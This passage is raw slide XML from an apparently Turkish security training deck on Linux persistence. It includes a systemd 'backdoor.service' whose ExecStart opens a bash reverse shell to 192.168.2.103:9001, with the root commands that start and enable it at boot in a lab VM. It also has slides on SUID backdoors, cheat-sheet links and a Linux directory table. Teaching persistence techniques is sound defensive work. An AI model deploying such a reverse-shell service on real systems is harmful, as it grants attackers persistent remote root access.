                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=root</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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DF3079"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ExecStart</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=/bin/bash -c </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"bash -i &gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="00A67D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/dev/tcp/192.168.2.103/9001 0&gt;&amp;1"</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[Install]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WantedBy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=multi-user.target</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="782500"/>
            <a:ext cx="4294500" cy="2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Servis dosyası:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="3044100"/>
            <a:ext cx="8598000" cy="354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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>root@pinkys-palace:/etc/systemd/system# systemctl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>backdoor.service</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="2700300"/>
            <a:ext cx="4294500" cy="2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Servis başlatma komutu</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704" name="Google Shape;704;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171625" y="4198750"/>
            <a:ext cx="8598000" cy="3540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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>root@pinkys-palace:/etc/systemd/system# systemctl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>enable</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> backdoor.service</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="3854675"/>
            <a:ext cx="8598000" cy="28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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Servis başlatma durumunda etkinleştirme. İşletim sistemi her başlatıldığında servis otomatik olarak çalışacak.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p89"/>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3"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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0" name="Shape 710"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="711" name="Google Shape;711;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="14733" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="295425" y="773225"/>
            <a:ext cx="8180865" cy="3774250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Google Shape;712;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="88389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Uygulama: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>servislerin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kötüye kullanımı</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="Google Shape;713;p90"/>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7" name="Shape 717"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718;p9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Backdoor: SUID bit sahip dosyalarda</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="719" name="Google Shape;719;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="294037" y="1221475"/>
            <a:ext cx="8555926" cy="1612700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Google Shape;720;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4831050"/>
            <a:ext cx="9144000" cy="36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1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kaynak: Fahmi FJ where Linux Backdoors and Where to Find Them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25" name="Shape 725"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="726" name="Google Shape;726;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482475" y="610925"/>
            <a:ext cx="5471525" cy="4098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9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Windows powershell cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sheet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="732" name="Google Shape;732;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="183948" y="625875"/>
            <a:ext cx="5963778" cy="4172150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="D9D9D9"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Google Shape;733;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271900" y="684825"/>
            <a:ext cx="2768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4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> Sheet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Google Shape;734;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271900" y="1116775"/>
            <a:ext cx="26868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7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Windows and Linux Terminals &amp; Command Lines </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271900" y="2126100"/>
            <a:ext cx="2768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8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>SANS PowerShell Cheat </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="Google Shape;736;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271900" y="2865000"/>
            <a:ext cx="2899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10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Command Line</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Google Shape;737;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271900" y="3326700"/>
            <a:ext cx="2716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12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Windows to Unix Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6271900" y="4059125"/>
            <a:ext cx="2716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u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Linux Shell Survival Guide</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:schemeClr val="accent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2" name="Shape 742"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="Google Shape;743;p9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Windows registry</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="744" name="Google Shape;744;p94"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="221860" y="678093"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{1ED9964D-1338-4093-AAAA-D3ECB9C76E77}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2926500"/>
                <a:gridCol w="5773800"/>
              </a:tblGrid>
              <a:tr h="230275">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OS INFORMATION</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Linux dosya sisteminin en üst düzeyidir. Tüm diğer dosya ve dizinler bu kök dizini altında bulunur.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PRODUCT NAME</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Temel sistem uygulamalarını ve komut dosyalarını içerir. Kullanıcıların sistemle etkileşimde bulunması için gerekli olan temel araçları içerir.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DATE OF INSTALL</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Sistem açılırken kullanılan çekirdek dosyaları ve önyükleme konfigürasyon dosyalarını içerir.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REGISTERED OWNER</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Cihaz dosyalarını içerir. Bu dosyalar, sistemdeki donanım ve diğer cihazları temsil eder.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/etc</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Sistem yapılandırma dosyalarını içerir. Bu dizinde, sistem ve uygulama ayarları, konfigürasyon dosyaları bulunur.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/home</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Kullanıcıların ev dizinlerini içerir. Her kullanıcı, bu dizinde kendi kişisel dosya ve alt dizinlere sahiptir.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/lib</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Paylaşılan kütüphane dosyalarını içerir. Uygulamalar bu kütüphaneleri kullanarak çalışır.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/mnt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Harici cihazları, örneğin CD-ROM'lar veya USB sürücülerini geçici olarak bağlamak için kullanılır.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="308500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>/opt</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Opsiyonel yazılımların veya uygulamaların kurulduğu dizindir.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>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48" name="Shape 748"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="749" name="Google Shape;749;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="0"/>
            <a:ext cx="7848300" cy="514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 de yer alan DNS sunucuları keşfetme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="750" name="Google Shape;750;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="33516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182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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 Bu bir örnek hosts dosyasıdır.</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127.0.0.1       localhost</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::1             localhost</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 Özel Eşleştirmeler</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192.168.1.2     example.com</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rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>192.168.1.3     sample.com</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
